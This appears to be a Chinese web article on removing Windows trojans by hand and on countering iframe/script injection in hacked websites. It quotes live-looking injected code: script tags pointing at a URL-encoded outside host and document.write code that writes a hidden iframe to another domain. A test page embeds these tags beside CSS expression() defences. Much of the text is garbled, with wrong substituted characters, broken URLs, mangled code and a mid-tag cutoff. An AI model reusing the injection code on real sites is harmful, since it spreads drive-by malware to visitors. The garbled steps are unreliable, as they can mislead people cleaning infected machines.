最简单的系统木马病毒解决方法

最简洁的系统木马病毒解决方法系统中木马病毒后该怎么办？下面我们介绍一些简洁的解决方法。翻开windows任务治理器，观察是否有可疑的进程(可以依据杀毒软件的报告或者在网上搜寻相关信息来判定)system32名目下的Rundll32.exe本身不是病毒，有可能一个dll文件在运行，他才可能是病毒或恶意程序之类的东西。由于windows任务治理器不能显示进程的路径，因此建议使用杀毒软件自带的进程观察和治理工具来查找并中止可疑进程。然后设法找到病毒程序文件(主要是你所中止的病毒的文件，再观察如system32文件夹中是否有不明dll或exeC:\ProgramFiles、C:\DocumentsandSettings\user\LocalSettings\TemporaryInternetFiles、C:\DocumentsandSettings\user\LocalSettings\Temp等处是否有不明文件或病毒程序文件)，然后删去，搞清楚是否是系统文件再动手。有些病毒进程终止不了，提示“拒绝访问”，或者消灭“屡禁不止”的状况。依据我的阅历，有三种方法供尝试：可能是某些木马病毒、流氓软件等注册为系统效劳了。方法是：观察掌握面板〉治理工具〉效劳，看有没有与之相关的效劳(特别是“描述”为空的)在运行，把它停顿。再试著中止病毒进程并删除。你可以尝试安全模式下(开机后按F8选安全模式)12A试一试。使用冰刃等工具，观察病毒进程的线程信息和模块信息，尝试完毕线程和解除模块，再试著删除病毒进程文件和相应的模块。(慎用)假设略微懂得注册表使用的，可以再把相关的注册表键值删除。一般方法：开头〉运行，输入regedit，确定，翻开注册表编辑器。编辑〉查找，查找目标为病毒进程名，在搜寻结果中将与之有关的键值删除。有时这样做不能遏止病毒，还应尝试使用步骤2中方法。IE360安全卫士，看扫瞄器关心对象BHO是否有可疑工程，有没有没恶意插件或者木马。有就修复它。其他提示：为了更好的操作，请先用优化大师或超级兔子清理全部临时文件和上网时的缓存文件。一般病毒往往在临时文件夹Temp中，这样做可以帮你更快找到病毒文件。开头>>运行，输入msconfig“系统配置有用程序”。选择“启动”，观察治本，甚至对某些程序来说无效。还是要按步骤1、2办。2009-03-0617:01网站被挂木马解决方法“://236z/viewthread.php?tid=428347“:://236z/viewthread.php?tid=428347QQMSN一行代码解决iframe挂马〔包含效劳器端注入、客户端ARP注入等〕》得到了——页面的顶部或底部加上了：留意，以下地址含有木马，请不要轻易访问：<scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script>汗死一连插入了N个一样的<script>标记偶的电脑什么补丁都打了直接访document.write(“<divstyle=”display:none”>“)document.write(“<iframe“://a.158dm/b1.htm?id=017“src=://a.158dm/b1.htm?id=017width=0height=0></iframe>“)document.write(“</div>“)“://a.158dm/b1.htm“JS网马的组织，哎，什么世道。还收费蛮高滴呢！...varKfqq,Qqs=“[color=Magenta]784378237[/color]“;qwfgsg=“LLLL\\XXXXXLD“;Kfqq=Qqs;)〔NJS〕<script>木马的特点是什么：<scriptsrc=://%76%63%63%64%2E%63%6E></script>对了，scriptsrcsrc；再看看木马的原形，里面还是输出iframe、JS<object>代码，不管这么多，来多少杀多少。CSS，5解决方案１：iframe{n1ifm:expression(this.src=”about:blank”,this.outerHTML=””);}/*这行代码是解决挂IFRAME木马的哦*/script{nojs1:expression((this.src.toLowerCase.indexOf(””)==0)?document.write(”木马被成功隔离!”):””);}src“”开头的外JS常显示。<script>木马的页面。解决方案２：iframe{nifm2:expression(this.src=”about:blank”,this.outerHTML=””);}script{no2js:expression((this.src.toLowerCase.indexOf(””)==0)?document.close:””);}document.close强制关闭。解决方案３：iframe{ni3fm:expression(this.src=”about:blank”,this.outerHTML=””);}script{n3ojs:expression((this.src.toLowerCase.indexOf(””)==0)?document.execCommand(”stop”):””);}execCommandJSJSIE解决方案４：iframe{nif4m:expression(this.src=”about:blank”,this.outerHTML=””);}script{noj4s:expression(if(this.src.indexOf(””)==0)this.src=”res://ieframe.dll/dnserror.htm”);}IE404JS解决方案5：iframe{nifm5:expression(this.src=”about:blank”,this.outerHTML=””);}script{noj5s:expression((this.id.toLowerCase.indexOf(”vok”)!=-1)?document.write(”木马被成功隔离!”):””));}HTML<script>中要参加以“lhid，如lhWeatherJSapi，<scriptsrc=“***/**.js“id=“lhSearchJSapi“></script>6此测试有肯定的危急性，请务必打好全部补丁再测试〕“://ght.cc/“ght.cc电影王国<!DOCTYPEhtmlPUBLIC“-//W3C//DTDXHTML1.0Transitional//EN““:///TR/xhtml1/DTD/xhtml1-transitional.dtd““:///TR/xhtml1/DTD/xhtml1-transitional.dtd“><html“:///1999/xhtml“xmlns=“:///1999/xhtml“><head><meta-equiv=“Content-Type“content=“text/html;charset=utf-8“/>JSCSS</title><styletype=“text/css“id=“LinrStudio“>/*<![CDATA[*/iframe{nhk1:expression(this.src=”about:blank”,this.outerHTML=””);}script{ngz1:expression((this.src.indexOf(””)==0)?document.close:””);}“:///ff/api.htm“*//*]]>*/</style></head><body><scripttype=“text/javascript“src=“1.js“></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=“://%76%63%63%64%2E%63%6E“type=“text/javascript“></script><scriptsrc=://%76%63%63%64%2E%63%6E></script>我是页面本身的１<scriptsrc=://%76%63%63%64%2E%63%6E></script>我是页面本身的２<scriptsrc=://%76%63%63%64%2E%63%6E></script>我是页面本身的３<scriptsrc=://%76%63%63%64%2E%63%6E></script></body></html>1.jsJSdocument.write(“<img